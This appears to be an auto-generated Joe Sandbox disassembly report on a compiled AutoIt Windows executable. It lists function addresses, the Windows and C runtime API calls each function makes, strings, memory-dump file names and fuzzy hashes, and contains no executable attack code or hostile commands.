Instruction ID: b1dd93d99df4d65d155ffa64e5d856d63aa15a621944af913d4849b5376d80e9
Opcode Fuzzy Hash: ca7b3489809a6b6da75d4527292edf96108f2c5ba2b7d4b897dcfa2af23942e4
Instruction Fuzzy Hash: 26018E31A02626E7F7A3AF69900479EBBA0BB44710F168049E4D4676C0CF7D7550CFC1

Function 01007A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 01007AD8

Part of subcall function 01007CF4: __mtinitlocknum.LIBCMT ref: 01007D06
Part of subcall function 01007CF4: EnterCriticalSection.KERNEL32(00000000,?,01007ADD,0000000D), ref: 01007D1F

InterlockedIncrement.KERNEL32(?), ref: 01007AE5
__lock.LIBCMT ref: 01007AF9
___addlocaleref.LIBCMT ref: 01007B17

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: 1095c324085d03ca02e4828de4dbb69e273c9498198dd09826af2dd43c62f67d
Instruction ID: b9d93994e2dd874474fc7e9a530b2380ee701dd61320b42163ae5817a0a87bb3
Opcode Fuzzy Hash: 1095c324085d03ca02e4828de4dbb69e273c9498198dd09826af2dd43c62f67d
Instruction Fuzzy Hash: CB015771500B01DEE732EF69C90478ABBE0AF64325F20890ED5DA872E0CB78A680CB40

Function 0104E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0104E33D
_memset.LIBCMT ref: 0104E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,010A3D00,010A3D44), ref: 0104E37B
CloseHandle.KERNEL32 ref: 0104E38D

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 429c8681c2ada0364d0e79958dd35529ca871c381ab9debec33216829bc489bd
Instruction ID: d4fcdf921c3503c496e4b499474fd1c4c1813f3210d25cad22a5ad8b056697dc
Opcode Fuzzy Hash: 429c8681c2ada0364d0e79958dd35529ca871c381ab9debec33216829bc489bd
Instruction Fuzzy Hash: 74F03AF1640715BAF2213AA4BC45FBB7E6CEB05A55F404421FE8ADA196D37A980087F8

Function 0104EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00FFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00FFAFE3
Part of subcall function 00FFAF83: SelectObject.GDI32(?,00000000), ref: 00FFAFF2
Part of subcall function 00FFAF83: BeginPath.GDI32(?), ref: 00FFB009
Part of subcall function 00FFAF83: SelectObject.GDI32(?,00000000), ref: 00FFB033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0104EA8E
LineTo.GDI32(00000000,?,?), ref: 0104EA9B
EndPath.GDI32(00000000), ref: 0104EAAB
StrokePath.GDI32(00000000), ref: 0104EAB9

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 9c65d4e948a2e2d55f56de15ce7132d73dd392d33feb7bdd41a8db8dba999709
Instruction ID: 9d2c6062f9a5934fe4fa4dc44f8b22360fb227046d3b944219efd7838ad2cf54
Opcode Fuzzy Hash: 9c65d4e948a2e2d55f56de15ce7132d73dd392d33feb7bdd41a8db8dba999709
Instruction Fuzzy Hash: 89F0BE31101258BBEB229F94AC09FCA3F59AF0A310F084101FB81640E1C3BE6121DB99

Function 0101C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0101C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0101C85D
GetCurrentThreadId.KERNEL32 ref: 0101C864
AttachThreadInput.USER32(00000000), ref: 0101C86B

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: ac16ab136b110f9049a5dd35535f3f08ad56d7c72f8037f301ae9b12d4e67df4
Instruction ID: 96a928e301a56b8f6f1444ca5f4ebf27d03b575b7403c2d6b973b19795f86111
Opcode Fuzzy Hash: ac16ab136b110f9049a5dd35535f3f08ad56d7c72f8037f301ae9b12d4e67df4
Instruction Fuzzy Hash: 95E06571241224B6EB201AE1DC4DEDB7F5CEF0A7B1F008011FA8D84464C6BAC580C7E0

Function 0101B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0101B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,0101AC9D), ref: 0101B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0101AC9D), ref: 0101B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,0101AC9D), ref: 0101B0F1

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 5066edd58905a81cd8639bceda72b95a6b2be90c6fc6c1a9190544660b00325f
Instruction ID: 0816dd7d70aae5afa2746f2cef7a08ed81aad62f3324eef80f30a69e6f41c273
Opcode Fuzzy Hash: 5066edd58905a81cd8639bceda72b95a6b2be90c6fc6c1a9190544660b00325f
Instruction Fuzzy Hash: AAE04F32701222EBE7711FF65C0CB563BE8AF45691F018858F2C1DA048DA6D80018760

Function 00FFB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00FFB496
SetTextColor.GDI32(?,000000FF), ref: 00FFB4A0
SetBkMode.GDI32(?,00000001), ref: 00FFB4B5
GetStockObject.GDI32(00000005), ref: 00FFB4BD
GetWindowDC.USER32(?,00000000), ref: 0105DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0105DE38
GetPixel.GDI32(00000000,?,00000000), ref: 0105DE51
GetPixel.GDI32(00000000,00000000,?), ref: 0105DE6A
GetPixel.GDI32(00000000,?,?), ref: 0105DE8A
ReleaseDC.USER32(?,00000000), ref: 0105DE95

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 70698d68a97419b5166b1dc4fdf00357ee0b32e07f3b143047c7df8dc5183c1d
Instruction ID: 373e5c65874d1181c0226901ef3d0276b0839394dd903e0b9e8755faa3224ef3
Opcode Fuzzy Hash: 70698d68a97419b5166b1dc4fdf00357ee0b32e07f3b143047c7df8dc5183c1d
Instruction Fuzzy Hash: FBE03931200240FAEB616BA8E809B993B51AB11335F008266FBE9580E683B685809B11

Function 0105B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0105B29A
GetDC.USER32(00000000), ref: 0105B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0105B2C3
ReleaseDC.USER32 ref: 0105B2E2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: dc5de3d50b508ec7aff00a1ac2f9df2f575a48432bdcf275e9f60e8f45c36861
Instruction ID: 70367fd5199e17858fdc7527c297ba1d132dfa65993c1737c8274a9503e3752d
Opcode Fuzzy Hash: dc5de3d50b508ec7aff00a1ac2f9df2f575a48432bdcf275e9f60e8f45c36861
Instruction Fuzzy Hash: B1E01AB1200204EFDB105FB0884862E7BA5EF4C350B118805FDDA87250CAB998409B50

Function 0101B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0101B2DF
UnloadUserProfile.USERENV(?,?), ref: 0101B2EB
CloseHandle.KERNEL32(?), ref: 0101B2F4
CloseHandle.KERNEL32(?), ref: 0101B2FC

Part of subcall function 0101AB24: GetProcessHeap.KERNEL32(00000000,?,0101A848), ref: 0101AB2B
Part of subcall function 0101AB24: HeapFree.KERNEL32(00000000), ref: 0101AB32

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6b0539c33acb709e7f5b4f040a0d1830e4014cc062507a325f6284475bf24f43
Instruction ID: ac379812bf339d2c10738106c7b8cfa06525a99d6a8e9b9a095fe234b6b74670
Opcode Fuzzy Hash: 6b0539c33acb709e7f5b4f040a0d1830e4014cc062507a325f6284475bf24f43
Instruction Fuzzy Hash: E3E0BF36204006BBCB112BD5DC08859FBB6FF983213108621F69581579CB3BA471EB50

Function 0105B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0105B2AE
GetDC.USER32(00000000), ref: 0105B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0105B2C3
ReleaseDC.USER32 ref: 0105B2E2

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 2b569f8d75d510c311bb9095b2fd7f98b36f304fba80809670c5c487acdbd723
Instruction ID: c740a2d4e9733f69e61966654122cec027a75676a4b3fe5e22f4661190ee1611
Opcode Fuzzy Hash: 2b569f8d75d510c311bb9095b2fd7f98b36f304fba80809670c5c487acdbd723
Instruction Fuzzy Hash: EFE04FB1600204EFDB105FB0C84862D7BA5EF4C350B118405F9DA87260CBBE99009B10

Function 0101DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0101DEAA

Strings

Container, xrefs: 0101DE29
AutoIt3GUI, xrefs: 0101DE22

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: f6cca3a75ecc1a82ab7f7e2c1839fe4b2ec870812c06bb9c625295e8ff68d656
Instruction ID: 730c183aff5982d44568d5afab3dd37944de273e737e494c1cf3f5fd597ea05a
Opcode Fuzzy Hash: f6cca3a75ecc1a82ab7f7e2c1839fe4b2ec870812c06bb9c625295e8ff68d656
Instruction Fuzzy Hash: 4C914D70600701AFDB54DFA8C888B6ABBF5BF48710F1085ADF98ACB295DB75E941CB50

Function 00FFBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00FFBCDA
GlobalMemoryStatusEx.KERNEL32 ref: 00FFBCF3

Strings

@, xrefs: 00FFBCE8

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 0af3c4add24a80ca26a77f4e581abe21c5c235ae5bd4bfe31a5b5832066b270b
Instruction ID: 2459d267f523a540040c3e4fc4f0374cf1069135c1dabf97560cfcfd947c1d44
Opcode Fuzzy Hash: 0af3c4add24a80ca26a77f4e581abe21c5c235ae5bd4bfe31a5b5832066b270b
Instruction Fuzzy Hash: 0F515971408748ABE360AF14DC85BAFBBE8FF94354F41484DF2C8421A6EF7584A89792

Function 0102C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00FE44ED: __fread_nolock.LIBCMT ref: 00FE450B

_wcscmp.LIBCMT ref: 0102C65D
_wcscmp.LIBCMT ref: 0102C670

Strings

FILE, xrefs: 0102C5A5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 587e045c6677b3434f4237bf1be0bd769a92842bf41f778722940de32591983d
Instruction ID: a0ef9d25f9898af762c85a63cca00c43d8a6ef95a0ea8a1734edad3ff95312bb
Opcode Fuzzy Hash: 587e045c6677b3434f4237bf1be0bd769a92842bf41f778722940de32591983d
Instruction Fuzzy Hash: 7541F672B0025ABBEF21EBA4CC45FEF77B9AF49704F000069FA45EB180D675AA04DB50

Function 0104A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0104A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0104A86F

Strings

', xrefs: 0104A7C3

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 6dba7c12b8bacec5c81cf5eeaa49ebcbda8ba6b65a122e98a67ee706e3386f21
Instruction ID: c93f57de02168c33ec2518865c97924e6f7d6709544bae2def473deb527613ed
Opcode Fuzzy Hash: 6dba7c12b8bacec5c81cf5eeaa49ebcbda8ba6b65a122e98a67ee706e3386f21
Instruction Fuzzy Hash: 4041E9B5F41209DFDB54CF68D881BDA7BB9FB08300F14006AE946AB341D775A945CF90

Function 01035180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01035190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 010351C6

Strings

|, xrefs: 010351B5

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 4fb3b5c04d2b5c675d47938d83b0846c94f707fe8c927703a8529621af71c4b7
Instruction ID: 00e11b8f524c9d1c1663c547c4790429d841c2b6b5d60155f3d36373f64c33fa
Opcode Fuzzy Hash: 4fb3b5c04d2b5c675d47938d83b0846c94f707fe8c927703a8529621af71c4b7
Instruction Fuzzy Hash: F4313771C00159ABCF01EFA5CC85EEEBFB9FF58740F000059F915A6166EB35AA06DBA0

Function 0104975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0104980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0104984A

Strings

static, xrefs: 010497AA

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: eec3c479393161bdc53728758eed301696de2483844e73bc1e83d47320fbd48e
Instruction ID: 573032afb89ce50f9ddb14140d7f887aa300ff58d3462a4dd7b69884f700c44e
Opcode Fuzzy Hash: eec3c479393161bdc53728758eed301696de2483844e73bc1e83d47320fbd48e
Instruction Fuzzy Hash: 27316DB1100604ABEB119F68CC81BFB77A9FF9C764F008629F9E9C7191CA75AC81D760

Function 01025157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010251C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 01025201

Strings

0, xrefs: 010251BF

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: cd6bf2c267df720374b4deaf3c984011afaa104289112e6d53e781245bfa7db8
Instruction ID: 09ff857a8e751ce1d62590a739f643c446106eac1f445f073e478a68cbe8bf5a
Opcode Fuzzy Hash: cd6bf2c267df720374b4deaf3c984011afaa104289112e6d53e781245bfa7db8
Instruction Fuzzy Hash: 5931AE31600225ABEB69CE9DDC44BEEBFF4AF47350F144099FAC1A61E0E7749648CB14

Function 0103658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 01036608

Strings

AUTOITCALLVARIABLE%d, xrefs: 010365FA
, $, xrefs: 01036648

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 9006905c19ef8dad4f1d779335f73201bc56982f345fee91230f2957c0793cbb
Instruction ID: 468b3078960394cd327bece2010e4c1536c68317717137b28f0c9fa17fa49d64
Opcode Fuzzy Hash: 9006905c19ef8dad4f1d779335f73201bc56982f345fee91230f2957c0793cbb
Instruction Fuzzy Hash: AA21AE31600219ABCF11EFA6CC91EEE77B8BF88744F000459F545AF141DA75EA05EBA5

Function 010493CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0104945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01049467

Strings

Combobox, xrefs: 01049429

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
